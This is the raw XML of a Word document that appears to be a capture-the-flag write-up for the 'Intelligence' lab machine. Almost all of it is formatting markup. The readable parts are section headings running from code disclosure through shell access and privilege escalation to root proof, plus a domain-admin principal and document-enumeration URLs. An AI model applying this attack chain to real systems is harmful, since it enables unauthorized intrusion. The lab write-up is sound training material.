    <w:p w14:paraId="73FCBBBF" w14:textId="77777777" w:rsidR="000578C7" w:rsidRDefault="000578C7" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A7FC0E" w14:textId="77777777" w:rsidR="000578C7" w:rsidRDefault="000578C7" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF7D628" w14:textId="6A3118F3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4. Code Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1E3E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AAABFB4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8E5BB1E" w14:textId="5EE10C89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lastRenderedPageBreak/>
        <w:t>5. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1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3620FF8B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CEF410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6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC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C2A148D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367FE24" w14:textId="4A3FC9B5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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30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6922CFE8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7CC4E7C" w14:textId="1F85BFFB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8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E805258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5074E486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64214A56" w14:textId="5BE3E27E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9. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D8C61" w14:textId="77777777" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="00A311DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00843D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AFB"/>
    <w:rsid w:val="00013459"/>
    <w:rsid w:val="0002547A"/>
    <w:rsid w:val="00041263"/>
    <w:rsid w:val="000578C7"/>
    <w:rsid w:val="000963B3"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000C6A4F"/>
    <w:rsid w:val="00107728"/>
    <w:rsid w:val="00111FBD"/>
    <w:rsid w:val="001403CC"/>
    <w:rsid w:val="001624CA"/>
    <w:rsid w:val="00163FA2"/>
    <w:rsid w:val="001930D1"/>
    <w:rsid w:val="001A1E43"/>
    <w:rsid w:val="001A7661"/>
    <w:rsid w:val="001C1400"/>
    <w:rsid w:val="001D19F8"/>
    <w:rsid w:val="001E2153"/>
    <w:rsid w:val="002255E6"/>
    <w:rsid w:val="00273395"/>
    <w:rsid w:val="002A36E7"/>
    <w:rsid w:val="002F6D92"/>
    <w:rsid w:val="00304690"/>
    <w:rsid w:val="00331B00"/>
    <w:rsid w:val="003527C3"/>
    <w:rsid w:val="00355420"/>
    <w:rsid w:val="00375CEE"/>
    <w:rsid w:val="00381529"/>
    <w:rsid w:val="003A46D1"/>
    <w:rsid w:val="003E7A43"/>
    <w:rsid w:val="00414FC9"/>
    <w:rsid w:val="00422AE5"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00435F37"/>
    <w:rsid w:val="00441896"/>
    <w:rsid w:val="004464E5"/>
    <w:rsid w:val="004737B2"/>
    <w:rsid w:val="00494DB8"/>
    <w:rsid w:val="004C6865"/>
    <w:rsid w:val="0050504F"/>
    <w:rsid w:val="005065AB"/>
    <w:rsid w:val="005417E8"/>
    <w:rsid w:val="00565BB6"/>
    <w:rsid w:val="00566C1C"/>
    <w:rsid w:val="005E1396"/>
    <w:rsid w:val="005F4ACA"/>
    <w:rsid w:val="006055F2"/>
    <w:rsid w:val="00626FC4"/>
    <w:rsid w:val="0064484A"/>
    <w:rsid w:val="006F7EA1"/>
    <w:rsid w:val="007D0766"/>
    <w:rsid w:val="007D7166"/>
    <w:rsid w:val="007E37D7"/>
    <w:rsid w:val="007E381C"/>
    <w:rsid w:val="007E4AE9"/>
    <w:rsid w:val="007E762A"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009459D3"/>
    <w:rsid w:val="00970C2D"/>
    <w:rsid w:val="009F275A"/>
    <w:rsid w:val="009F327B"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A60EEC"/>
    <w:rsid w:val="00A61704"/>
    <w:rsid w:val="00A74D8C"/>
    <w:rsid w:val="00AE0F4F"/>
    <w:rsid w:val="00AF20D2"/>
    <w:rsid w:val="00B36AE7"/>
    <w:rsid w:val="00BA0A38"/>
    <w:rsid w:val="00BD0D3B"/>
    <w:rsid w:val="00BD5891"/>
    <w:rsid w:val="00C73BED"/>
    <w:rsid w:val="00CB32B3"/>
    <w:rsid w:val="00CD7648"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D51309"/>
    <w:rsid w:val="00D64F5E"/>
    <w:rsid w:val="00D953B9"/>
    <w:rsid w:val="00D956D8"/>
    <w:rsid w:val="00D979A4"/>
    <w:rsid w:val="00DA2D73"/>
    <w:rsid w:val="00DC34A1"/>
    <w:rsid w:val="00DD2C33"/>
    <w:rsid w:val="00DD6D30"/>
    <w:rsid w:val="00DE07DB"/>
    <w:rsid w:val="00DE2F91"/>
    <w:rsid w:val="00DE53A1"/>
    <w:rsid w:val="00E03ED6"/>
    <w:rsid w:val="00E4044B"/>
    <w:rsid w:val="00E45725"/>
    <w:rsid w:val="00E537BE"/>
    <w:rsid w:val="00E54010"/>
    <w:rsid w:val="00E56B2C"/>
    <w:rsid w:val="00EB5541"/>
    <w:rsid w:val="00EF5798"/>
    <w:rsid w:val="00F0518D"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F619D1"/>
    <w:rsid w:val="00FB3DE8"/>
    <w:rsid w:val="00FD1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596D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E03A3A5B-E9F2-43CE-B86B-8D51C3210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A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A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A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A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A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A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A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A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A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A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AF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255E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55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intelligence.htb/Administrator@dc.intelligence.htb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ip/documents/$i" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/documents/$i" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://main-request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</TotalTime>
  <Pages>4</Pages>
  <Words>567</Words>
  <Characters>3234</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>26</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Manvar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhavya Manvar</cp:lastModifiedBy>
  <cp:revision>99</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-19T11:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>